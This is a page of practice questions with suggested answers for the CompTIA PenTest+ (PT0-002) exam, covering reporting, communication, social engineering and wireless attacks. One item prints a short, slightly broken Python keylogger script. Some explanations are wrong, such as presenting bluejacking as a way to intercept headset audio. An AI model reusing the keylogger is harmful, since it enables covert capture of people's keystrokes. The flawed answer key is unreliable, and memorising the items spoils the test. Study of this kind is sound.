ExamGecko
Home Home / CompTIA / PT0-002

CompTIA PT0-002 Practice Test - Questions Answers, Page 39

Question list
Search
Search

List of questions

Search

Related questions











Which of the following best explains why communication is a vital phase of a penetration test?

A.
To discuss situational awareness
A.
To discuss situational awareness
Answers
B.
To build rapport with the emergency contact
B.
To build rapport with the emergency contact
Answers
C.
To explain the data destruction process
C.
To explain the data destruction process
Answers
D.
To ensure the likelihood of future assessments
D.
To ensure the likelihood of future assessments
Answers
Suggested answer: A

Explanation:

Communication is a vital phase of a penetration test to ensure all parties involved are aware of the test's progress, findings, and any potential impact on business operations. Discussing situational awareness involves sharing real-time insights about the security posture, any vulnerabilities found, and potential risks. This enables the organization to make informed decisions, mitigate risks promptly, and ensure the test aligns with business objectives and constraints.


Which of the following describes how a penetration tester could prioritize findings in a report?

A.
Business mission and goals
A.
Business mission and goals
Answers
B.
Cyberassets
B.
Cyberassets
Answers
C.
Network infrastructure
C.
Network infrastructure
Answers
D.
Cyberthreats
D.
Cyberthreats
Answers
Suggested answer: A

Explanation:

Prioritizing findings in a penetration test report should align with the business mission and goals. Understanding the business context allows a penetration tester to assess the impact of vulnerabilities in relation to the organization's critical functions and assets. This approach ensures that recommendations are not only technically sound but also relevant and actionable within the business's strategic framework. Options B, C, and D (Cyberassets, Network infrastructure, and Cyberthreats) are important factors but should be considered within the context of how they affect the business's mission and goals.

During an assessment, a penetration tester emailed the following Python script to CompTIA's employees:

import pyHook, sys, logging, pythoncom, datetime

log_file='C:\\Windows\\Temp\\log_comptia.txt' def KbrdEvent(event):

logging.basicConfig(filename=log_file,level=logging.DEBUG, format='%(messages)s') chr(event.Ascii)

logging.log(10, chr(event.Ascii))

return True

hooks_manager = pyHook.HookManager()

hooks_manager.KeyDown = KbrdEvent

hooks_manager.HookKeyboard()

pythoncom.PumpMessages()

Which of the following is the intended effect of this script?

A.
Debugging an exploit
A.
Debugging an exploit
Answers
B.
Keylogging
B.
Keylogging
Answers
C.
Collecting logs
C.
Collecting logs
Answers
D.
Scheduling tasks
D.
Scheduling tasks
Answers
Suggested answer: B

Explanation:

The provided Python script is designed to function as a keylogger, which is a type of surveillance software that has the capability to record every keystroke made on a computer. The script uses the pyHook library to hook into and monitor all keyboard events. When a key is pressed, the KbrdEvent function is triggered, which logs the ASCII value of the pressed key to a file named log_comptia.txt located in C:\\Windows\\Temp. The script is configured to continuously monitor keyboard events and log them, making its intended effect keylogging, rather than debugging an exploit, collecting logs in a general sense, or scheduling tasks.

For an engagement, a penetration tester is required to use only local operating system tools for file transfer. Which of the following options should the penetration tester consider?

A.
Netcat
A.
Netcat
Answers
B.
WinSCP
B.
WinSCP
Answers
C.
Filezilla
C.
Filezilla
Answers
D.
Netstat
D.
Netstat
Answers
Suggested answer: A

Explanation:

Netcat is a versatile networking utility which reads and writes data across network connections, using the TCP/IP protocol. It's included in many Linux distributions and is available for Windows as well. Since the requirement is to use only local operating system tools for file transfer, Netcat is a suitable option because it can easily be scripted or used directly from the command line to send and receive files, making it a powerful tool for file transfers in a penetration testing context. Options B and C, WinSCP and Filezilla, are not typically considered local operating system tools as they are third-party applications that need to be installed. Option D, Netstat, is a network utility that displays network connections, routing tables, and a number of network interface and network protocol statistics, and is not used for file transfers.

A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?

A.
Bluejacking
A.
Bluejacking
Answers
B.
Bluesnarfing
B.
Bluesnarfing
Answers
C.
BLE attack
C.
BLE attack
Answers
D.
WPS PIN attack
D.
WPS PIN attack
Answers
Suggested answer: C

Explanation:

A BLE (Bluetooth Low Energy) attack is specifically designed to exploit vulnerabilities in the Bluetooth Low Energy protocol, which is commonly used in modern wireless devices, including key fobs for electric vehicles. This type of attack can allow a penetration tester to intercept, manipulate, or take control of the communication between the key fob and the vehicle. Bluejacking and Bluesnarfing are older Bluetooth attacks that are less effective against modern BLE implementations. WPS PIN attacks target Wi-Fi Protected Setup, which is unrelated to key fobs and electric vehicles.

Which of the following would be the most efficient way to write a Python script that interacts with a web application?

A.
Create a class for requests.
A.
Create a class for requests.
Answers
B.
Write a function for requests.
B.
Write a function for requests.
Answers
C.
Import the requests library.
C.
Import the requests library.
Answers
D.
Use the cURL OS command.
D.
Use the cURL OS command.
Answers
Suggested answer: C

Explanation:

The most efficient way to write a Python script that interacts with web applications is to import the requests library. The requests library is a Python HTTP library that simplifies making HTTP requests to web servers, which is essential for interacting with web applications. It allows you to easily send HTTP/1.1 requests, without the need for manually adding query strings to your URLs, or form-encode your POST data. Options A and B involve creating a class or function for requests, which could be more time-consuming and less efficient than using a well-established library like requests. Option D, using the cURL OS command, is less efficient in a Python script since it involves calling an external command rather than using a native Python library.

A penetration tester is conducting a test after hours and notices a critical system was taken down. Which of the following contacts should be notified first?

A.
Secondary
A.
Secondary
Answers
B.
Emergency
B.
Emergency
Answers
C.
Technical
C.
Technical
Answers
D.
Primary
D.
Primary
Answers
Suggested answer: D

Explanation:

In the context of penetration testing, the primary contact is typically the first point of contact established before the penetration test begins. This person is usually a stakeholder or an individual who has the authority and responsibility over the system being tested. In the scenario where a critical system is taken down during off-hours, the primary contact should be notified first to ensure a prompt and coordinated response. The primary contact can then decide on the next steps, including escalating the issue to technical, secondary, or emergency contacts if necessary. This approach maintains the chain of command and ensures that the appropriate parties are informed in a structured manner.

A penetration tester approaches a company employee in the smoking area and starts a conversation about the company's recent social event. After a few minutes, the employee holds the badge-protected door open for the penetration tester and both enter the company's building. Which of the following attacks did the penetration tester perform?

A.
Dumpster diving
A.
Dumpster diving
Answers
B.
Phishing
B.
Phishing
Answers
C.
Badge cloning
C.
Badge cloning
Answers
D.
Tailgating
D.
Tailgating
Answers
Suggested answer: D

Explanation:

In this scenario, the penetration tester performed a 'Tailgating' attack (D), where the tester follows closely behind a legitimate employee to gain unauthorized access to a secure area without being noticed. This social engineering technique relies on exploiting human tendencies to be polite or avoid confrontation, rather than using technical hacking methods. The tester engaged the employee in casual conversation to appear less suspicious and took advantage of the situation when the employee, perhaps distracted or feeling socially obliged, held the door open for them.

A penetration tester noticed that an employee was using a wireless headset with a smartphone. Which of the following methods would be best to use to intercept the communications?

A.
Multiplexing
A.
Multiplexing
Answers
B.
Bluejacking
B.
Bluejacking
Answers
C.
Zero-day attack
C.
Zero-day attack
Answers
D.
Smurf attack
D.
Smurf attack
Answers
Suggested answer: B

Explanation:

To intercept the communications between an employee's wireless headset and smartphone, the penetration tester would likely use 'Bluejacking' (B). Bluejacking involves sending unsolicited messages to Bluetooth-enabled devices, but in the context of penetration testing and security, it can also encompass techniques for intercepting or hijacking Bluetooth connections. This could allow the tester to eavesdrop on communications or even take control of the headset.

After performing a web penetration test, a security consultant is ranking the findings by criticality. Which of the following standards or methodologies would be best for the consultant to use for reference?

A.
OWASP
A.
OWASP
Answers
B.
MITRE ATT&CK
B.
MITRE ATT&CK
Answers
C.
PTES
C.
PTES
Answers
D.
NIST
D.
NIST
Answers
Suggested answer: A

Explanation:

After performing a web penetration test, using the OWASP (Open Web Application Security Project) standards or methodologies would be the best choice for ranking the findings by criticality. OWASP is renowned for its comprehensive documentation and guidelines on web application security, including the well-known OWASP Top 10 list, which outlines the ten most critical web application security risks. This makes it an ideal reference for categorizing and prioritizing vulnerabilities discovered during a web penetration test.

While MITRE ATT&CK, PTES (Penetration Testing Execution Standard), and NIST (National Institute of Standards and Technology) provide valuable frameworks and methodologies for cybersecurity, OWASP's focus on web applications specifically makes it the most suitable for this context.

Total 422 questions
Go to page: of 43